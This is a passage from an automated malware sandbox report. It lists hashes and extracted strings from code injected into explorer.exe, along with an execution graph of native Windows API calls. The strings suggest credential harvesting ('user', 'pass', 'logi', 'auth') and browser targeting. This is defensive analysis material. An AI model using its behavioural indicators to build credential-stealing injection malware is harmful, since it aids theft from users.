                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                    • API String ID: 0-3136806129
                                                                                                                    • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                    • Instruction ID: 8c4f678bb2da3e1173b2c706c71cfdf2f46aa542a292cd91c0df14b1d1c461a5
                                                                                                                    • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                    • Instruction Fuzzy Hash: 9A319E3021CB584FCB94EF288494BAAB7E1FF98300F95662D954ECB255DF30D505CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1F8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                    • API String ID: 0-319646191
                                                                                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                    • Instruction ID: 395a5392cd9a811714b69ebe21b59ff73f271fe95ebbe299fd0ff7e8da6e8b5d
                                                                                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                    • Instruction Fuzzy Hash: 0B31CE31614A5C8BCF14EFA8C884BFEB7E1FF58204F45122AD54EE7240DE78C6458789
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1F8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                    • API String ID: 0-319646191
                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                    • Instruction ID: b0289cbd69fa4e42910d68020cf8a698e40c4029d53d9c70bb4bb5ec8361cf4d
                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                    • Instruction Fuzzy Hash: 4221CE31A14A5C8ACF15EFA8C884BFEBBA1FF58204F45522AD55AE7240DE74C6058B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE20E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$l$l$t
                                                                                                                    • API String ID: 0-168566397
                                                                                                                    • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                    • Instruction ID: 929f52395bb5e37b6a446eea97d0b5ffe3542871c3053aa99fb07516f9cfb59e
                                                                                                                    • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                    • Instruction Fuzzy Hash: 1C217A70A28A1E9BDB08EFA8C0847AEBAF0FF18314F50562ED109E3600DB74D5918B84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE20E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$l$l$t
                                                                                                                    • API String ID: 0-168566397
                                                                                                                    • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                    • Instruction ID: 47e619cc8e6c976b557ba0072723c89e6a37eb5bcdf4757e8f1bfb52ecd0e38f
                                                                                                                    • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                    • Instruction Fuzzy Hash: 2C215A74A28A1D9BDB08EFA8D4447EDBBF1FB18314F51562ED109E3A00DB74D5918B84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE20FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: auth$logi$pass$user
                                                                                                                    • API String ID: 0-2393853802
                                                                                                                    • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                    • Instruction ID: 8148e895fd33b88a7e468eafee8179bbf29e4154b20a0403cb93cde25538b000
                                                                                                                    • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                    • Instruction Fuzzy Hash: 0521CA30618B1D8BCB05DF9998807EEB7F1EF88344F00661EE40AEB244DBB0D9148BC2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:2%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:592
                                                                                                                    Total number of Limit Nodes:70
                                                                                                                    execution_graph 97550 3332ad0 LdrInitializeThunk 97551 2949080 97562 294bd40 97551->97562 97553 294919c 97554 29490bb 97554->97553 97565 293acf0 97554->97565 97558 2949120 Sleep 97559 294910d 97558->97559 97559->97553 97559->97558 97574 2948ca0 LdrLoadDll 97559->97574 97575 2948eb0 LdrLoadDll 97559->97575 97563 294bd6d 97562->97563 97576 294a540 97562->97576 97563->97554 97566 293ad14 97565->97566 97567 293ad50 LdrLoadDll 97566->97567 97568 293ad1b 97566->97568 97567->97568 97569 2944e50 97568->97569 97570 2944e5e 97569->97570 97572 2944e6a 97569->97572 97570->97572 97583 29452d0 LdrLoadDll 97570->97583 97572->97559 97573 2944fbc 97573->97559 97574->97559 97575->97559 97577 294a55c NtAllocateVirtualMemory 97576->97577 97579 294af60 97576->97579 97577->97563 97580 294af70 97579->97580 97582 294af92 97579->97582 97581 2944e50 LdrLoadDll 97580->97581 97581->97582 97582->97577 97583->97573 97584 294f10d 97587 294b9d0 97584->97587 97588 294b9f6 97587->97588 97595 2939d40 97588->97595 97590 294ba02 97591 294ba26 97590->97591 97603 2938f30 97590->97603 97641 294a6b0 97591->97641 97644 2939c90 97595->97644 97597 2939d4d 97598 2939d54 97597->97598 97656 2939c30 97597->97656 97598->97590 97604 2938f57 97603->97604 98057 293b1c0 97604->98057 97606 2938f69 98061 293af10 97606->98061 97608 2938f86 97615 2938f8d 97608->97615 98132 293ae40 LdrLoadDll 97608->98132 97611 2938ffc 98077 293f410 97611->98077 97613 2939006 97614 294bf90 2 API calls 97613->97614 97637 29390f2 97613->97637 97616 293902a 97614->97616 97615->97637 98065 293f380 97615->98065 97617 294bf90 2 API calls 97616->97617 97618 293903b 97617->97618 97619 294bf90 2 API calls 97618->97619 97620 293904c 97619->97620 98089 293ca90 97620->98089 97622 2939059 97623 2944a50 8 API calls 97622->97623 97624 2939066 97623->97624 97625 2944a50 8 API calls 97624->97625 97626 2939077 97625->97626 97627 29390a5 97626->97627 97628 2939084 97626->97628 97630 2944a50 8 API calls 97627->97630 98099 293d620 97628->98099 97636 29390c1 97630->97636 97632 29390e9 97634 2938d00 23 API calls 97632->97634 97634->97637 97635 2939092 98115 2938d00 97635->98115 97636->97632 98133 293d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97636->98133 97637->97591 97642 294af60 LdrLoadDll 97641->97642 97643 294a6cf 97642->97643 97676 2948bc0 97644->97676 97648 2939cb6 97648->97597 97649 2939cac 97649->97648 97683 294b2b0 97649->97683 97651 2939cf3 97651->97648 97694 2939ab0 97651->97694 97653 2939d13 97700 2939620 LdrLoadDll 97653->97700 97655 2939d25 97655->97597 97657 2939c40 97656->97657 98036 294b5a0 97657->98036 97660 294b5a0 LdrLoadDll 97661 2939c5b 97660->97661 97662 294b5a0 LdrLoadDll 97661->97662 97663 2939c71 97662->97663 97664 293f180 97663->97664 97665 293f199 97664->97665 98040 293b040 97665->98040 97667 293f1ac 98044 294a1e0 97667->98044 97670 2939d65 97670->97590 97672 293f1d2 97673 293f1fd 97672->97673 98050 294a260 97672->98050 97674 294a490 2 API calls 97673->97674 97674->97670 97677 2948bcf 97676->97677 97678 2944e50 LdrLoadDll 97677->97678 97679 2939ca3 97678->97679 97680 2948a70 97679->97680 97701 294a600 97680->97701 97684 294b2c9 97683->97684 97704 2944a50 97684->97704 97686 294b2e1 97687 294b2ea 97686->97687 97743 294b0f0 97686->97743 97687->97651 97689 294b2fe 97689->97687 97761 2949f00 97689->97761 98014 2937ea0 97694->98014 97696 2939ad1 97696->97653 97697 2939aca 97697->97696 98027 2938160 97697->98027 97700->97655 97702 294af60 LdrLoadDll 97701->97702 97703 2948a85 97702->97703 97703->97649 97705 2944a64 97704->97705 97706 2944d85 97704->97706 97705->97706 97769 2949c50 97705->97769 97706->97686 97709 2944b90 97772 294a360 97709->97772 97710 2944b73 97830 294a460 LdrLoadDll 97710->97830 97713 2944b7d 97713->97686 97714 2944bb7 97715 294bdc0 2 API calls 97714->97715 97716 2944bc3 97715->97716 97716->97713 97717 2944d49 97716->97717 97719 2944d5f 97716->97719 97723 2944c52 97716->97723 97718 294a490 2 API calls 97717->97718 97720 2944d50 97718->97720 97839 2944790 LdrLoadDll NtReadFile NtClose 97719->97839 97720->97686 97722 2944d72 97722->97686 97724 2944cb9 97723->97724 97726 2944c61 97723->97726 97724->97717 97725 2944ccc 97724->97725 97832 294a2e0 97725->97832 97728 2944c66 97726->97728 97729 2944c7a 97726->97729 97831 2944650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97728->97831 97732 2944c97 97729->97732 97733 2944c7f 97729->97733 97732->97720 97788 2944410 97732->97788 97776 29446f0 97733->97776 97736 2944c70 97736->97686 97737 2944c8d 97737->97686 97739 2944d2c 97836 294a490 97739->97836 97740 2944caf 97740->97686 97742 2944d38 97742->97686 97744 294b101 97743->97744 97745 294b113 97744->97745 97746 294bd40 2 API calls 97744->97746 97745->97689 97747 294b134 97746->97747 97857 2944070 97747->97857 97749 294b180 97749->97689 97750 294b157 97750->97749 97751 2944070 3 API calls 97750->97751 97753 294b179 97751->97753 97753->97749 97889 2945390 97753->97889 97754 294b20a 97755 294b21a 97754->97755 97983 294af00 LdrLoadDll 97754->97983 97899 294ad70 97755->97899 97758 294b248 97978 2949ec0 97758->97978 97762 294af60 LdrLoadDll 97761->97762 97763 2949f1c 97762->97763 98008 3332c0a 97763->98008 97764 2949f37 97766 294bdc0 97764->97766 97767 294b359 97766->97767 98011 294a670 97766->98011 97767->97651 97770 294af60 LdrLoadDll 97769->97770 97771 2944b44 97770->97771 97771->97709 97771->97710 97771->97713 97773 294a376 97772->97773 97774 294af60 LdrLoadDll 97773->97774 97775 294a37c NtCreateFile 97774->97775 97775->97714 97777 294470c 97776->97777 97778 294a2e0 LdrLoadDll 97777->97778 97779 294472d 97778->97779 97780 2944734 97779->97780 97781 2944748 97779->97781 97783 294a490 2 API calls 97780->97783 97782 294a490 2 API calls 97781->97782 97785 2944751 97782->97785 97784 294473d 97783->97784 97784->97737 97840 294bfd0 LdrLoadDll RtlAllocateHeap 97785->97840 97787 294475c 97787->97737 97789 294448e 97788->97789 97790 294445b 97788->97790 97792 29445d9 97789->97792 97796 29444aa 97789->97796 97791 294a2e0 LdrLoadDll 97790->97791 97793 2944476 97791->97793 97794 294a2e0 LdrLoadDll 97792->97794 97795 294a490 2 API calls 97793->97795 97800 29445f4 97794->97800 97797 294447f 97795->97797 97798 294a2e0 LdrLoadDll 97796->97798 97797->97740 97799 29444c5 97798->97799 97802 29444e1 97799->97802 97803 29444cc 97799->97803 97853 294a320 LdrLoadDll 97800->97853 97806 29444e6 97802->97806 97807 29444fc 97802->97807 97805 294a490 2 API calls 97803->97805 97804 294462e 97809 294a490 2 API calls 97804->97809 97810 29444d5 97805->97810 97808 294a490 2 API calls 97806->97808 97813 2944501 97807->97813 97841 294bf90 97807->97841 97811 29444ef 97808->97811 97812 2944639 97809->97812 97810->97740 97811->97740 97812->97740 97817 2944513 97813->97817 97844 294a410 97813->97844 97816 2944567 97818 294457e 97816->97818 97852 294a2a0 LdrLoadDll 97816->97852 97817->97740 97820 2944585 97818->97820 97821 294459a 97818->97821 97822 294a490 2 API calls 97820->97822 97823 294a490 2 API calls 97821->97823 97822->97817 97824 29445a3 97823->97824 97825 29445cf 97824->97825 97847 294bb90 97824->97847 97825->97740 97827 29445ba 97828 294bdc0 2 API calls 97827->97828 97829 29445c3 97828->97829 97829->97740 97830->97713 97831->97736 97833 294af60 LdrLoadDll 97832->97833 97834 2944d14 97833->97834 97835 294a320 LdrLoadDll 97834->97835 97835->97739 97837 294af60 LdrLoadDll 97836->97837 97838 294a4ac NtClose 97837->97838 97838->97742 97839->97722 97840->97787 97854 294a630 97841->97854 97843 294bfa8 97843->97813 97845 294af60 LdrLoadDll 97844->97845 97846 294a42c NtReadFile 97845->97846 97846->97816 97848 294bbb4 97847->97848 97849 294bb9d 97847->97849 97848->97827 97849->97848 97850 294bf90 2 API calls 97849->97850 97851 294bbcb 97850->97851 97851->97827 97852->97818 97853->97804 97855 294af60 LdrLoadDll 97854->97855 97856 294a64c RtlAllocateHeap 97855->97856 97856->97843 97858 2944081 97857->97858 97859 2944089 97857->97859 97858->97750 97888 294435c 97859->97888 97984 294cf30 97859->97984 97861 29440dd 97862 294cf30 2 API calls 97861->97862 97865 29440e8 97862->97865 97863 2944136 97866 294cf30 2 API calls 97863->97866 97865->97863 97867 294d060 3 API calls 97865->97867 97995 294cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 97865->97995 97868 294414a 97866->97868 97867->97865 97869 29441a7 97868->97869 97989 294d060 97868->97989 97870 294cf30 2 API calls 97869->97870 97872 29441bd 97870->97872 97873 29441fa 97872->97873 97875 294d060 3 API calls 97872->97875 97874 294cf30 2 API calls 97873->97874 97876 2944205 97874->97876 97875->97872 97877 294d060 3 API calls 97876->97877 97884 294423f 97876->97884 97877->97876 97879 2944334 97997 294cf90 LdrLoadDll RtlFreeHeap 97879->97997 97881 294433e 97998 294cf90 LdrLoadDll RtlFreeHeap 97881->97998 97883 2944348 97999 294cf90 LdrLoadDll RtlFreeHeap 97883->97999 97996 294cf90 LdrLoadDll RtlFreeHeap 97884->97996 97886 2944352 98000 294cf90 LdrLoadDll RtlFreeHeap 97886->98000 97888->97750 97890 29453a1 97889->97890 97891 2944a50 8 API calls 97890->97891 97893 29453b7 97891->97893 97892 294540a 97892->97754 97893->97892 97894 2945405 97893->97894 97895 29453f2 97893->97895 97897 294bdc0 2 API calls 97894->97897 97896 294bdc0 2 API calls 97895->97896 97898 29453f7 97896->97898 97897->97892 97898->97754 98001 294ac30 97899->98001 97902 294ac30 LdrLoadDll 97903 294ad8d 97902->97903 97904 294ac30 LdrLoadDll 97903->97904 97905 294ad96 97904->97905 97906 294ac30 LdrLoadDll 97905->97906 97907 294ad9f 97906->97907 97908 294ac30 LdrLoadDll 97907->97908 97909 294ada8 97908->97909 97910 294ac30 LdrLoadDll 97909->97910 97911 294adb1 97910->97911 97912 294ac30 LdrLoadDll 97911->97912 97913 294adbd 97912->97913 97914 294ac30 LdrLoadDll 97913->97914 97915 294adc6 97914->97915 97916 294ac30 LdrLoadDll 97915->97916 97917 294adcf 97916->97917 97918 294ac30 LdrLoadDll 97917->97918 97919 294add8 97918->97919 97920 294ac30 LdrLoadDll 97919->97920 97921 294ade1 97920->97921 97922 294ac30 LdrLoadDll 97921->97922 97923 294adea 97922->97923 97924 294ac30 LdrLoadDll 97923->97924 97925 294adf6 97924->97925 97926 294ac30 LdrLoadDll 97925->97926 97927 294adff 97926->97927 97928 294ac30 LdrLoadDll 97927->97928 97929 294ae08 97928->97929 97930 294ac30 LdrLoadDll 97929->97930 97931 294ae11 97930->97931 97932 294ac30 LdrLoadDll 97931->97932 97933 294ae1a 97932->97933 97934 294ac30 LdrLoadDll 97933->97934 97935 294ae23 97934->97935 97936 294ac30 LdrLoadDll 97935->97936 97937 294ae2f 97936->97937 97938 294ac30 LdrLoadDll 97937->97938 97939 294ae38 97938->97939 97940 294ac30 LdrLoadDll 97939->97940 97941 294ae41 97940->97941 97942 294ac30 LdrLoadDll 97941->97942 97943 294ae4a 97942->97943 97944 294ac30 LdrLoadDll 97943->97944 97945 294ae53 97944->97945 97946 294ac30 LdrLoadDll 97945->97946 97947 294ae5c 97946->97947 97948 294ac30 LdrLoadDll 97947->97948 97949 294ae68 97948->97949 97950 294ac30 LdrLoadDll 97949->97950 97951 294ae71 97950->97951 97952 294ac30 LdrLoadDll 97951->97952 97953 294ae7a 97952->97953 97954 294ac30 LdrLoadDll 97953->97954 97955 294ae83 97954->97955 97956 294ac30 LdrLoadDll 97955->97956 97957 294ae8c 97956->97957 97958 294ac30 LdrLoadDll 97957->97958 97959 294ae95 97958->97959 97960 294ac30 LdrLoadDll 97959->97960 97961 294aea1 97960->97961 97962 294ac30 LdrLoadDll 97961->97962 97963 294aeaa 97962->97963 97964 294ac30 LdrLoadDll 97963->97964 97965 294aeb3 97964->97965 97966 294ac30 LdrLoadDll 97965->97966 97967 294aebc 97966->97967 97968 294ac30 LdrLoadDll 97967->97968 97969 294aec5 97968->97969 97970 294ac30 LdrLoadDll 97969->97970 97971 294aece 97970->97971 97972 294ac30 LdrLoadDll 97971->97972 97973 294aeda 97972->97973 97974 294ac30 LdrLoadDll 97973->97974 97975 294aee3 97974->97975 97976 294ac30 LdrLoadDll 97975->97976 97977 294aeec 97976->97977 97977->97758 97979 294af60 LdrLoadDll 97978->97979 97980 2949edc 97979->97980 98007 3332df0 LdrInitializeThunk 97980->98007 97981 2949ef3 97981->97689 97983->97755 97985 294cf46 97984->97985 97986 294cf40 97984->97986 97987 294bf90 2 API calls 97985->97987 97986->97861 97988 294cf6c 97987->97988 97988->97861 97990 294cfd0 97989->97990 97991 294d02d 97990->97991 97992 294bf90 2 API calls 97990->97992 97991->97868 97993 294d00a 97992->97993 97994 294bdc0 2 API calls 97993->97994 97994->97991 97995->97865 97996->97879 97997->97881 97998->97883 97999->97886 98000->97888 98002 294ac4b 98001->98002 98003 2944e50 LdrLoadDll 98002->98003 98004 294ac6b 98003->98004 98005 2944e50 LdrLoadDll 98004->98005 98006 294ad17 98004->98006 98005->98006 98006->97902 98007->97981 98009 3332c11 98008->98009 98010 3332c1f LdrInitializeThunk 98008->98010 98009->97764 98010->97764 98012 294af60 LdrLoadDll 98011->98012 98013 294a68c RtlFreeHeap 98012->98013 98013->97767 98015 2937eb0 98014->98015 98016 2937eab 98014->98016 98017 294bd40 2 API calls 98015->98017 98016->97697 98024 2937ed5 98017->98024 98018 2937f38 98018->97697 98019 2949ec0 2 API calls 98019->98024 98020 2937f3e 98021 2937f64 98020->98021 98023 294a5c0 2 API calls 98020->98023 98021->97697 98026 2937f55 98023->98026 98024->98018 98024->98019 98024->98020 98025 294bd40 2 API calls 98024->98025 98030 294a5c0 98024->98030 98025->98024 98026->97697 98028 293817e 98027->98028 98029 294a5c0 2 API calls 98027->98029 98028->97653 98029->98028 98031 294af60 LdrLoadDll 98030->98031 98032 294a5dc 98031->98032 98035 3332c70 LdrInitializeThunk 98032->98035 98033 294a5f3 98033->98024 98035->98033 98037 294b5c3 98036->98037 98038 293acf0 LdrLoadDll 98037->98038 98039 2939c4a 98038->98039 98039->97660 98041 293b063 98040->98041 98042 293b0e0 98041->98042 98055 2949c90 LdrLoadDll 98041->98055 98042->97667 98045 294af60 LdrLoadDll 98044->98045 98046 293f1bb 98045->98046 98046->97670 98047 294a7d0 98046->98047 98048 294af60 LdrLoadDll 98047->98048 98049 294a7ef LookupPrivilegeValueW 98048->98049 98049->97672 98051 294a27c 98050->98051 98052 294af60 LdrLoadDll 98050->98052 98056 3332ea0 LdrInitializeThunk 98051->98056 98052->98051 98053 294a29b 98053->97673 98055->98042 98056->98053 98058 293b1c9 98057->98058 98059 293b040 LdrLoadDll 98058->98059 98060 293b204 98059->98060 98060->97606 98062 293af34 98061->98062 98134 2949c90 LdrLoadDll 98062->98134 98064 293af6e 98064->97608 98066 293f3ac 98065->98066 98067 293b1c0 LdrLoadDll 98066->98067 98068 293f3be 98067->98068 98135 293f290 98068->98135 98071 293f3f1 98073 293f402 98071->98073 98076 294a490 2 API calls 98071->98076 98072 293f3d9 98074 293f3e4 98072->98074 98075 294a490 2 API calls 98072->98075 98073->97611 98074->97611 98075->98074 98076->98073 98078 293f43c 98077->98078 98154 293b2b0 98078->98154 98080 293f44e 98081 293f290 3 API calls 98080->98081 98082 293f45f 98081->98082 98083 293f481 98082->98083 98084 293f469 98082->98084 98086 293f492 98083->98086 98088 294a490 2 API calls 98083->98088 98085 293f474 98084->98085 98087 294a490 2 API calls 98084->98087 98085->97613 98086->97613 98087->98085 98088->98086 98090 293caa6 98089->98090 98091 293cab0 98089->98091 98090->97622 98092 293af10 LdrLoadDll 98091->98092 98094 293cb4e 98092->98094 98093 293cb74 98093->97622 98094->98093 98095 293b040 LdrLoadDll 98094->98095 98096 293cb90 98095->98096 98097 2944a50 8 API calls 98096->98097 98098 293cbe5 98097->98098 98098->97622 98100 293d646 98099->98100 98101 293b040 LdrLoadDll 98100->98101 98102 293d65a 98101->98102 98158 293d310 98102->98158 98104 293908b 98105 293cc00 98104->98105 98106 293cc26 98105->98106 98107 293b040 LdrLoadDll 98106->98107 98108 293cca9 98106->98108 98107->98108 98109 293b040 LdrLoadDll 98108->98109 98110 293cd16 98109->98110 98111 293af10 LdrLoadDll 98110->98111 98112 293cd7f 98111->98112 98113 293b040 LdrLoadDll 98112->98113 98114 293ce2f 98113->98114 98114->97635 98118 2938d14 98115->98118 98188 293f6d0 98115->98188 98117 2938f25 98117->97591 98118->98117 98193 29443a0 98118->98193 98120 2938d70 98120->98117 98196 2938ab0 98120->98196 98123 294cf30 2 API calls 98124 2938db2 98123->98124 98125 294d060 3 API calls 98124->98125 98129 2938dc7 98125->98129 98126 2937ea0 4 API calls 98126->98129 98129->98117 98129->98126 98130 293c7b0 18 API calls 98129->98130 98131 2938160 2 API calls 98129->98131 98201 293f670 98129->98201 98205 293f080 21 API calls 98129->98205 98130->98129 98131->98129 98132->97615 98133->97632 98134->98064 98136 293f2aa 98135->98136 98144 293f360 98135->98144 98137 293b040 LdrLoadDll 98136->98137 98138 293f2cc 98137->98138 98145 2949f40 98138->98145 98140 293f30e 98148 2949f80 98140->98148 98143 294a490 2 API calls 98143->98144 98144->98071 98144->98072 98146 2949f5c 98145->98146 98147 294af60 LdrLoadDll 98145->98147 98146->98140 98147->98146 98149 294af60 LdrLoadDll 98148->98149 98150 2949f9c 98149->98150 98153 33335c0 LdrInitializeThunk 98150->98153 98151 293f354 98151->98143 98153->98151 98155 293b2d7 98154->98155 98156 293b040 LdrLoadDll 98155->98156 98157 293b313 98156->98157 98157->98080 98159 293d327 98158->98159 98167 293f710 98159->98167 98164 293d3a2 98164->98104 98166 293d3b5 98166->98104 98168 293f735 98167->98168 98180 29381a0 98168->98180 98170 293d36f 98175 294a6e0 98170->98175 98171 2944a50 8 API calls 98173 293f759 98171->98173 98173->98170 98173->98171 98174 294bdc0 2 API calls 98173->98174 98187 293f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 98173->98187 98174->98173 98176 294a6ff CreateProcessInternalW 98175->98176 98177 294af60 LdrLoadDll 98175->98177 98178 293d39b 98176->98178 98177->98176 98178->98164 98179 294a2a0 LdrLoadDll 98178->98179 98179->98166 98181 293829f 98180->98181 98182 29381b5 98180->98182 98181->98173 98182->98181 98183 2944a50 8 API calls 98182->98183 98185 2938222 98183->98185 98184 2938249 98184->98173 98185->98184 98186 294bdc0 2 API calls 98185->98186 98186->98184 98187->98173 98189 2944e50 LdrLoadDll 98188->98189 98190 293f6ef 98189->98190 98191 293f6f6 SetErrorMode 98190->98191 98192 293f6fd 98190->98192 98191->98192 98192->98118 98195 29443c6 98193->98195 98206 293f4a0 98193->98206 98195->98120 98197 294bd40 2 API calls 98196->98197 98200 2938ad5 98197->98200 98198 2938cea 98198->98123 98200->98198 98225 2949880 98200->98225 98202 293f683 98201->98202 98273 2949e90 98202->98273 98205->98129 98207 293f4bd 98206->98207 98213 2949fc0 98207->98213 98210 293f505 98210->98195 98214 2949fdc 98213->98214 98215 294af60 LdrLoadDll 98213->98215 98223 3332f30 LdrInitializeThunk 98214->98223 98215->98214 98216 293f4fe 98216->98210 98218 294a010 98216->98218 98219 294af60 LdrLoadDll 98218->98219 98220 294a02c 98219->98220 98224 3332d10 LdrInitializeThunk 98220->98224 98221 293f52e 98221->98195 98223->98216 98224->98221 98226 294bf90 2 API calls 98225->98226 98227 2949897 98226->98227 98246 2939310 98227->98246 98229 29498b2 98230 29498f0 98229->98230 98231 29498d9 98229->98231 98234 294bd40 2 API calls 98230->98234 98232 294bdc0 2 API calls 98231->98232 98233 29498e6 98232->98233 98233->98198 98235 294992a 98234->98235 98236 294bd40 2 API calls 98235->98236 98237 2949943 98236->98237 98243 2949be4 98237->98243 98252 294bd80 LdrLoadDll 98237->98252 98239 2949bc9 98240 2949bd0 98239->98240 98239->98243 98241 294bdc0 2 API calls 98240->98241 98242 2949bda 98241->98242 98242->98198 98244 294bdc0 2 API calls 98243->98244 98245 2949c39 98244->98245 98245->98198 98247 2939335 98246->98247 98248 293acf0 LdrLoadDll 98247->98248 98249 2939368 98248->98249 98251 293938d 98249->98251 98253 293cf20 98249->98253 98251->98229 98252->98239 98254 293cf4c 98253->98254 98255 294a1e0 LdrLoadDll 98254->98255 98256 293cf65 98255->98256 98257 293cf6c 98256->98257 98258 293cf8f 98256->98258 98264 294a220 98256->98264 98257->98251 98258->98257 98269 294a810 98258->98269 98261 293cfa7 98262 294a490 2 API calls 98261->98262 98263 293cfca 98262->98263 98263->98251 98265 294a23c 98264->98265 98266 294af60 LdrLoadDll 98264->98266 98272 3332ca0 LdrInitializeThunk 98265->98272 98266->98265 98267 294a257 98267->98258 98270 294af60 LdrLoadDll 98269->98270 98271 294a82f 98270->98271 98271->98261 98272->98267 98274 294af60 LdrLoadDll 98273->98274 98275 2949eac 98274->98275 98278 3332dd0 LdrInitializeThunk 98275->98278 98276 293f6ae 98276->98129 98278->98276

                                                                                                                    Executed Functions

                                                                                                                    Function 0294A31D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 283 294a31d-294a31f 284 294a376-294a3b1 call 294af60 NtCreateFile 283->284 285 294a321-294a359 call 294af60 283->285
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02944BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02944BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0294A3AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 823142352-1441809116
